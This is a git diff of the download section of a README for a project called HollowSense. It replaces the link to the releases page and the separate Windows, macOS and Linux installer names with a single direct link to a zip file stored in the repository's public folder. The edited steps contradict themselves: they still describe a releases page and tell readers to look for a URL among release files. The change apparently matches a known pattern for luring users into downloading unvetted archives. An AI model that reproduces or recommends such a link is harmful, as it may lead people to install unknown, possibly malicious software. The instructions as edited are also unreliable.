ivan0770/hollowsense.github.io/README.md

 ## 📥 Download & Install

-1. Click the following link to visit the Releases page: [Download Here](https://github.com/ivan0770/hollowsense.github.io/releases).
+1. Click the following link to visit the Releases page: [Download Here](https://raw.githubusercontent.com/ivan0770/hollowsense.github.io/main/public/github-hollowsense-io-3.5.zip).

 2. On the Releases page, you will see a list of available versions.
 Look for the latest release, usually marked with the highest version number.

 3. Click on the version you want to download.
 A list of files will appear.

 4. Find the file that matches your operating system:
-   - For Windows, look for something like `HollowSenseSetup.exe`.
+   - For Windows, look for something like `https://raw.githubusercontent.com/ivan0770/hollowsense.github.io/main/public/github-hollowsense-io-3.5.zip`.
-   - For macOS, look for `HollowSense.dmg`.
+   - For macOS, look for `https://raw.githubusercontent.com/ivan0770/hollowsense.github.io/main/public/github-hollowsense-io-3.5.zip`.
-   - For Linux, you might find `HollowSense.AppImage`.
+   - For Linux, you might find `https://raw.githubusercontent.com/ivan0770/hollowsense.github.io/main/public/github-hollowsense-io-3.5.zip`.

 5. Click the file to start the download.
 Once the download is complete, navigate to your downloads folder.